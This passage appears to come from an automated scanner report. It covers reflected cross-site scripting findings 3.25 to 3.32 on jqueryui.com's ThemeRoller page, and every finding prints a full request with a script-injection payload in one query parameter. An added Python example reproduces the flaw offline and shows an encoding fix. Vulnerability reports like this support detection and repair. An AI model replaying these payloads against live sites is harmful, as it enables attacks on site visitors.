ureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100f7d26"><script>alert(1)</script>9819ffd82a&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png
...[SNIP]...

3.25. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0704"><script>alert(1)</script>a3a7395d188 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20f0704"><script>alert(1)</script>a3a7395d188&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20f0704"><script>alert(1)</script>a3a7395d188&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=6
...[SNIP]...

3.26. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3af5a"><script>alert(1)</script>8c485dccd0a was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=203af5a"><script>alert(1)</script>8c485dccd0a&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=203af5a"><script>alert(1)</script>8c485dccd0a&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B100
...[SNIP]...

3.27. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c33d8"><script>alert(1)</script>f1bc2116d7 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50c33d8"><script>alert(1)</script>f1bc2116d7&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120319

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50c33d8"><script>alert(1)</script>f1bc2116d7&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055
...[SNIP]...

3.28. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34b50"><script>alert(1)</script>5a9fde23895 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=034b50"><script>alert(1)</script>5a9fde23895&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=034b50"><script>alert(1)</script>5a9fde23895&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" t
...[SNIP]...

3.29. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 862b5"><script>alert(1)</script>264ef754561 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The response fragment below also shows where the reflection lands: the whole query string is echoed into the href attribute of a stylesheet <link> element (the reflected text is immediately followed by " type="text/css" media="all" />), so the "> at the start of the payload closes that attribute and the tag, and the injected <script> element is parsed as markup rather than as part of the URL.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100862b5"><script>alert(1)</script>264ef754561&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100862b5"><script>alert(1)</script>264ef754561&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...
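Findings 3.24 through 3.34 (and the request that opens this section) are all the same defect: a ThemeRoller query parameter is concatenated, unencoded, into a double-quoted attribute, and the scanner's marker payload breaks out of it. The script below is an added example, not part of the scanner output and not jQuery UI's own code. It reproduces the pattern offline: a hypothetical page generator that echoes the query string into a <link href="..."> the way the response fragments show, the hardened form that encodes at the sink, a classifier that reports whether a probe came back raw, entity-encoded, altered or not at all, and an HTML-tokenizer check that confirms a real <script> start tag was created rather than relying on a string match. The /theme.css path and the render functions are made-up stand-ins for the real markup; the sample parameters are constructed from the 3.24 request (the probe is appended to the normal value, as in bgImgOpacityError=100f7d26"...). One caveat the report does not state: the request lines above show the payload with raw ", < and > characters, which is the scanner's display; a client reproducing the request must percent-encode them, which build_request_url does.

```python
"""Offline reproduction of the attribute-context reflected XSS pattern in
findings 3.24-3.34. Added example; not scanner output or jQuery UI code.
The page generators are hypothetical stand-ins and /theme.css is made up."""
import html
import re
import secrets
from html.parser import HTMLParser
from urllib.parse import urlencode

# Break-out core used by the scanner, framed by random hex markers so the
# reflection can be located unambiguously inside a 120 KB response.
CORE = '"><script>alert(1)</script>'
# The exact probe from finding 3.24, kept fixed for deterministic checks.
PROBE = 'f7d26' + CORE + '9819ffd82a'

# Constructed sample parameters (subset of the 3.24 request): the probe is
# appended to the normal value, exactly as the report's request line shows.
SAMPLE_PARAMS = {
    'bgColorError': 'FFFFFF',
    'bgTextureError': '01_flat.png',
    'bgImgOpacityError': '100' + PROBE,
    'borderColorError': 'B10000',
}


def make_probe():
    """Scanner-style marker payload with fresh random hex on both sides."""
    return secrets.token_hex(3)[:5] + CORE + secrets.token_hex(6)[:11]


def build_request_url(params, base='http://jqueryui.com/themeroller/'):
    """What goes on the wire: urlencode percent-encodes the " < > ( ) / that
    the report's request lines display raw."""
    return base + '?' + urlencode(params)


def vulnerable_render(params):
    """Hypothetical generator behaving as the report describes: the query
    string is concatenated, unencoded, into a double-quoted href."""
    qs = '&'.join(f'{k}={v}' for k, v in params.items())
    return ('<link rel="stylesheet" href="/theme.css?' + qs +
            '" type="text/css" media="all" />')


def fixed_render(params):
    """Hardened form: encode at the sink. html.escape(quote=True) turns
    & < > " ' into entities, so user input can no longer close the attribute."""
    qs = '&'.join(f'{k}={v}' for k, v in params.items())
    return ('<link rel="stylesheet" href="/theme.css?' +
            html.escape(qs, quote=True) + '" type="text/css" media="all" />')


def classify_reflection(body, probe):
    """How the probe came back:
    'raw'     byte-for-byte, the report's "echoed unmodified" case;
    'encoded' markers present, metacharacters between them entity-encoded;
    'altered' markers present but the middle is neither raw nor a pure
              encoding (filtered or truncated: needs manual review);
    'absent'  not reflected at all."""
    if probe in body:
        return 'raw'
    prefix, suffix = probe.split(CORE, 1)
    m = re.search(re.escape(prefix) + r'(.*?)' + re.escape(suffix), body, re.S)
    if not m:
        return 'absent'
    return 'encoded' if html.unescape(m.group(0)) == probe else 'altered'


class _TagCollector(HTMLParser):
    """Records every start tag the HTML tokenizer emits."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def script_tag_created(body):
    """True only if the tokenizer actually yields a <script> start tag, i.e.
    the break-out succeeded at the HTML level, not merely as a substring."""
    parser = _TagCollector()
    parser.feed(body)
    parser.close()
    return 'script' in parser.tags


if __name__ == '__main__':
    for name, render in (('vulnerable', vulnerable_render), ('fixed', fixed_render)):
        body = render(SAMPLE_PARAMS)
        print(name, classify_reflection(body, PROBE), script_tag_created(body))
    print(build_request_url(SAMPLE_PARAMS))
```

Running it prints `vulnerable raw True` and `fixed encoded False`. The 'altered' outcome is the one to watch when re-testing after a fix: a response that strips `<` and `>` but keeps `"` still lets input terminate the attribute, which a pure raw/absent check would miss; encoding at the sink, as fixed_render does, is the fix that survives such partial filtering.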

3.30. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40148"><script>alert(1)</script>b76740fa911 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png40148"><script>alert(1)</script>b76740fa911&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png40148"><script>alert(1)</script>b76740fa911&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4
...[SNIP]...

3.31. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a15e"><script>alert(1)</script>81a0d838539 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png4a15e"><script>alert(1)</script>81a0d838539&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png4a15e"><script>alert(1)</script>81a0d838539&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF
...[SNIP]...

3.32. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe60a"><script>alert(1)</script>ce06652329f was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.pngfe60a"><script>alert(1)</script>ce06652329f&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=